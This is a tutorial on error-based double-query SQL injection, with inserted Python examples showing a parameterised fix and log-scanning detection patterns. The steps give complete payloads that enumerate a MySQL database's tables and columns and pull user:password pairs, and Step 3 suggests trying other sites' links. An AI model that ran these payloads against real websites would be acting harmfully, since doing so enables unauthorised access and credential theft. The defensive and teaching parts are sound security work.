Today we look at error-based injection. For that we first need to understand a few SQL functions and clauses: Concat, Rand, As, Group By, Count and Floor.
- concat - joins 2 or more strings/columns into one string
- group by - groups the rows according to the values in a specific column, so that further calculations (like count) can be done on each group
- floor(x.y) - rounds down to the nearest integer, e.g. floor(1.7) = 1
- rand([x]) - generates a random number between 0 and 1; if a seed x is given, the sequence of numbers returned is the same every time for that seed (so rand(0) is predictable)
- as - gives a temporary name (alias) to a column in the output of a select command
- count(column) - counts the number of NON-NULL values in a column; count(*) counts all rows
Software Used :-
- DVWA (Damn Vulnerable Web Application)
- Firefox
- HackBar (Firefox add-on)
ASCII Code :- (ASCII table, used in Step 6 to write a table name as char() codes)
NOTE
*** Base Query FOR double query injection ***
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (<any SQL query here>)) a from information_schema.tables group by a)b)
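The base query only works because the application pastes the id parameter straight into the SQL text and then shows the raw database error to the user (Step 2 below depends on exactly that). The following is an added example, not code from this post or from DVWA: a small Python/sqlite3 stand-in for page.php with the vulnerable lookup next to the fixed one. The table, rows and function names are made up for the demo; sqlite is used so it runs offline, and since it has no information_schema the injected query simply fails with a database error in the vulnerable version, which is the same class of behaviour (a raw DB error handed back to the client) that the steps below rely on.

```python
import sqlite3

# Constructed demo database (not DVWA's schema): one news table with two rows.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first post"), (89, "release notes")])
    return conn

# Payload shape from this post (Step 4), used here only as test input.
INJECTED = ("1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, "
            "(database())) a from information_schema.tables group by a)b)")

def lookup_vulnerable(conn, user_id):
    """Vulnerable pattern: the parameter becomes part of the SQL text and
    the raw database error is returned to the caller."""
    sql = f"SELECT title FROM news WHERE id = {user_id}"
    try:
        row = conn.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.Error as e:
        # This is the leak: the client sees the database's own message.
        return ("error", str(e))

def lookup_hardened(conn, user_id):
    """Fixed pattern: validate the expected type, then bind the value."""
    # Fix 1: the page expects a numeric id, so reject anything else up front.
    if not isinstance(user_id, str) or not user_id.isdigit():
        return ("rejected", None)
    # Fix 2: a bound parameter can never be parsed as SQL syntax.
    row = conn.execute("SELECT title FROM news WHERE id = ?",
                       (int(user_id),)).fetchone()
    return ("ok", row[0] if row else None)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id :", lookup_vulnerable(db, "89"))
    print("vulnerable, payload   :", lookup_vulnerable(db, INJECTED))
    print("hardened, normal id   :", lookup_hardened(db, "89"))
    print("hardened, payload     :", lookup_hardened(db, INJECTED))
```

Two things change in the hardened version: the value is bound instead of concatenated, and the request is rejected before it reaches the database if it is not the integer the page expects. In a real application the remaining database errors should be logged server-side and answered with a generic message, so that no MySQL text reaches the browser at all.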
Steps :->
Step 1: find dynamic page
site.com/page.php?news=89
Step 2: append ' to check whether the website gives a MySQL error
site.com/page.php?news=89'
You must see an error like:
You have an error in your SQL syntax; check the manual that corresponds... MySQL ......
Step 3: find the injection type
site.com/page.php?news=89'--+
- if the page opens normally then the injection type is string
- if not, try removing the '
- site.com/page.php?news=89--+
- if it works now then the injection type is integer
- if it still does not, try ", "), ') etc.
- if none works, try another link
Step 4: get the name of the current database
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (database())) a from information_schema.tables group by a)b)
Now you will get an error like :-
Duplicate entry '1::dvwa' for key 'group_key'
in place of dvwa you will see the name of the current database
Step 5: get the names of the tables (assuming database name is dvwa)
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (select table_name from information_schema.tables where table_schema=database() limit 0,1)) a from information_schema.tables group by a)b)
this gives the 1st table; for the next table use limit 1,1 and similarly for the nth table limit n-1,1
Step 6: get the column names from the juicy table (assuming table=users; here the table name is written with its ASCII codes, char(117,115,101,114,115), so no quotes are needed)
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (select column_name from information_schema.columns where table_schema=database() and table_name = char(117,115,101,114,115) limit 0,1)) a from information_schema.tables group by a)b)
Step 7: get the data from the juicy columns (assuming columns=user,password)
site.com/page.php?id=1 and (select 1 from (select count(*),concat(floor(rand(0)*2), 0x3a3a, (select concat(user,0x2d2d,password) from dvwa.users limit 3,1) ) a from information_schema.tables group by a)b)
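Seen from the defender's side, every step above sends the same very recognisable request shape (count(*), floor(rand(, group by, information_schema) and relies on MySQL's Duplicate entry ... for key 'group_key' message being returned to the browser. The following is an added example, not part of the original post: a Python script that URL-decodes request lines from a web-server access log, flags requests that carry that combination of signals, and separately flags the leaked group_key error in an application log. The log lines are constructed for the demo, and the signal names are my own.

```python
import re
from urllib.parse import unquote_plus

# Patterns taken from the payload shape used in this post. Each one alone is
# weak (plenty of legitimate input says "group by"); the double-query technique
# needs several of them together in one request.
SIGNALS = {
    "count_star":  re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "floor_rand":  re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by":    re.compile(r"group\s+by", re.I),
    "info_schema": re.compile(r"information_schema\.", re.I),
}

# The MySQL error the technique depends on. If it shows up in an application
# log or a response body, the database error reached the client.
LEAK = re.compile(r"Duplicate entry '.*' for key 'group_key'")

def decode(s):
    # Decode twice: some clients percent-encode an already encoded string.
    return unquote_plus(unquote_plus(s))

def signals_in(query_string):
    """Names of the signals present in a (possibly encoded) query string."""
    q = decode(query_string)
    return [name for name, rx in SIGNALS.items() if rx.search(q)]

def is_double_query(query_string, threshold=3):
    return len(signals_in(query_string)) >= threshold

def scan_access_log(lines):
    """Return (line_no, signals) for requests that look like the base query."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        _, _, qs = m.group(1).partition("?")
        if is_double_query(qs):
            findings.append((n, signals_in(qs)))
    return findings

def scan_error_log(lines):
    """Line numbers where the group_key error was leaked."""
    return [n for n, line in enumerate(lines, 1) if LEAK.search(line)]

# Constructed sample lines (not real traffic); line 3 is the Step 4 request.
ACCESS_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /page.php?news=89 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /page.php?news=89%27 HTTP/1.1" 200 1203',
    '10.0.0.5 - - [12/Mar/2024:10:01:31 +0000] "GET /page.php?id=1%20and%20(select%201%20from%20'
    '(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(database()))%20a%20from%20'
    'information_schema.tables%20group%20by%20a)b) HTTP/1.1" 200 1290',
    '10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /search.php?q=group+by+category HTTP/1.1" 200 800',
]
ERROR_LOG = [
    "[12/Mar/2024 10:01:09] Query failed: You have an error in your SQL syntax",
    "[12/Mar/2024 10:01:31] Query failed: Duplicate entry '1::dvwa' for key 'group_key'",
]

if __name__ == "__main__":
    for n, hits in scan_access_log(ACCESS_LOG):
        print(f"access log line {n}: double-query signals {hits}")
    for n in scan_error_log(ERROR_LOG):
        print(f"error log line {n}: group_key error reached the client")
```

The threshold of three signals keeps the harmless "group by category" search on line 4 out of the findings while still catching line 3, and the second scan is the more important one: a group_key error in the application log is direct evidence that database errors are being displayed, which is the misconfiguration to fix first.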
NOTE:- Please do not use this information for bad work. :)
Thanks :) :)